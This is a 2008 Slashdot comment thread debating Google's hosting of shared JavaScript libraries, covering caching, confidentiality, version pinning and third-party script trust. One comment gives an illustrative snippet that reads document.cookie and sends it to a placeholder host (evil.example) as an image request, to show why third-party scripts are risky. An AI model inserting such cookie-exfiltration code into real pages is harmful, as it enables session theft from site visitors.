      That's not the reason that I generally use external JavaScript files. The reason is code reuse, pure and simple. Generally speaking it's far easier to just link to the file (especially for static HTML pages) than it is to try to inline it. That way, when you fix a bug that affects Internet Explorer 6.0.5201 on Windows XP SP1.5 or whatever, you don't have to copy it to all your static files, as the code is in a single location.

      Sure, you could use server-side includes, but then you need to make sure that yo

    • The external file requires yet another hit to the server, and everything involved therein. It almost never makes any sense.

      To the end user, you are right. However, from a web developer/programming standpoint, it actually does make sense. It is all about modular use of code -- when you write C/C++ programs, do you incorporate all of the code in-line, or do you reference standard libraries to handle some of the common functions? You use standard libraries of course, because it makes your code easier to maintain. If you need to update a function, you change it in one place (the external library) and voila! All of your code

    • So, don't put confidential information in your GET requests, and they won't be part of the referrer sent to Google. Duh.
    • Re: (Score:3, Interesting)

      by Bogtha ( 906264 )

      Second, I've always had this complaint with the whole external javascript files. When you're already downloading a 50K html page, another 10K of javascript code in the same file inline downloads at full-speed. The external file requires yet another hit to the server, and everything involved therein. It almost never makes any sense.

      It almost always makes sense. The external file only requires another hit to the server the first time you see it. From that point on, every page hit is smaller in size b

    • But still, hosting a part of your corporate web-site with google simply breaches most of your confidentiality and non-disclosure agreements that you have with your clients and suppliers. It's that simple. Find the line that reads "shall not in any way disclose Confidential Information to any third party at any time, including consultants and contractors, copy and/or merge the Confidential Information/business relationship with any other technology, software or materials, except contractors with a specific need to know . . ."

      There is a legal definition of "confidential information" to be satisfied if one were to actually pursue a breach of contract. I do not see how HTTP GET requests could possibly satisfy that. Google would see only a requesting IP and what file was served (a standard UI library). This is not substantially different from what any intermediary on the public Internet would see as the packets passed through.

      If you and I have an NDA, and I place a call to you from my cell phone, the mere existence of that call do

    • all SMTP passes in the open right?

      google or not-- emails pass through third parties all the time.
  • by Rich ( 9681 ) on Wednesday May 28, 2008 @11:34AM (#23571227) Homepage
    Well, one effect of this would be to allow google to execute scripts in the security context of any site using their copy of the code. The same issue occurs for urchin.js etc. If your site needs to comply with regulations like PCI DSS or similar then you shouldn't be doing this as it means google has access to your cookies, can change your content etc. etc.

    For many common sites that aren't processing sensitive information however, sharing this code is probably a very good idea. Even better would be if google provided a signed version of the code so that you could see if it has been changed.
    • Re: (Score:3, Informative)

      These are static releases of library code written by others.

      Google would only be able to execute Javascript on your user's page if they modified the source code of the library you were loading from them. Which would be a BIG no-no.

      (Google does have a "loader" function available, but also just allows you to include the libraries via a traditional script tag to a static URL.)

      Otherwise, cookies are NOT cross-domain and wouldn't be passed with the HTTP request, unless you were silly enough to CNAME your "js.mys
      • by Rich ( 9681 )
        I'm afraid you have no guarantee the code is unmodified - that's why I suggested it should be signed. You're also wrong about the cookies: they are accessible from JavaScript using document.cookie, which means that any malicious script could access them (and even send them to a 3rd party). There is an HttpOnly flag on cookies (an extension added in IE6 SP1), but that flag has to be specifically set (see http://www.owasp.org/index.php/HTTPOnly [owasp.org] for more details).
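        To illustrate the concern (evil.example is a placeholder): any script running in the page, whether first-party or included from a third party, can do

        var c = document.cookie; // every cookie not flagged HttpOnly, e.g. "SESSIONID=abc123"
        new Image().src = 'http://evil.example/log?c=' + encodeURIComponent(c);

        which is exactly why serving a page's scripts from a third party means trusting that third party.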
        • by richardtallent ( 309050 ) on Wednesday May 28, 2008 @01:45PM (#23573361) Homepage
          Do you *honestly* think that Google is going to modify the code for Prototype and slap some AdSense/Analytics goodies in there?

          The library developers would have their hide if they attempted such a thing!

          And I'm NOT wrong about cookies. Your site's cookies are not sent in the HTTP request, they would only be accessible via JavaScript--and again, without Google modifying the source code of these libraries to be malicious, they wouldn't be privy to those cookies.

          Not that cookies store anything useful these days... almost everyone with serious server-side code uses server-side persisted sessions, so the only cookie is the session ID.
    • by Bogtha ( 906264 )

      Well, one effect of this would be to allow google to execute scripts in the security context of any site using their copy of the code. The same issue occurs for urchin.js etc.

      The difference between this and urchin, adsense, etc, is that the specific scripts you use are defined ahead of time. If they serve anything other than jQuery or whatever, then they are almost certainly in breach of many laws across the world, e.g. the Computer Misuse Act in the UK. When you reference jQuery on their systems, y

  • I asked Google to do this a long time ago:

    http://www.tallent.us/blog/?p=7

    This will enable web developers to support richer, cross-browser apps without the full "hit" of additional HTTP connections and bandwidth.

    Users gain the benefit of faster rendering on every site that uses these libraries--both due to proper caching, and because their browser can open more simultaneous HTTP connections.

    If Google goes down, change your header/footer scripts. BFD.

    In an age where Flash/Silverlight/etc. are supposed to be t
  • Dependency hell? (Score:4, Insightful)

    by jmason ( 16123 ) on Wednesday May 28, 2008 @12:01PM (#23571677) Homepage
    One site covering this [ajaxian.com] noted plans to 'stay up to date with the most recent bug fixes' of the hosted libraries -- this sounds like blindly upgrading the hosted libraries to new versions, which is a very bad idea.

    As a commenter there noted, it's a much better idea to use version-specific URIs, allowing users to choose the versions they wish to use -- otherwise version mismatches will occur between user apps and the Google-hosted libs, creating bugs and the classic 'dependency hell' that would be familiar to anyone who remembers the days of 'DLL hell'.
    • Re: (Score:3, Informative)

      by Spaceman40 ( 565797 )
      Read, and be enlightened:

      The versioning system allows your application to specify a desired version with as much precision as it needs. By dropping version fields, you end up wild carding a field. -- google.load() versioning [google.com]
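      In other words, assuming www.google.com/jsapi has already been included (exact version numbers are just examples):

      google.load("jquery", "1.2.6"); // pin an exact release
      google.load("jquery", "1.2");   // wildcard the patch level: latest 1.2.x
      google.load("jquery", "1");     // wildcard further: latest 1.x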
  • This isn't something Google came up with. It's great that they're doing it, but YUI did it quite a while ago. http://developer.yahoo.com/yui/articles/hosting/ [yahoo.com]
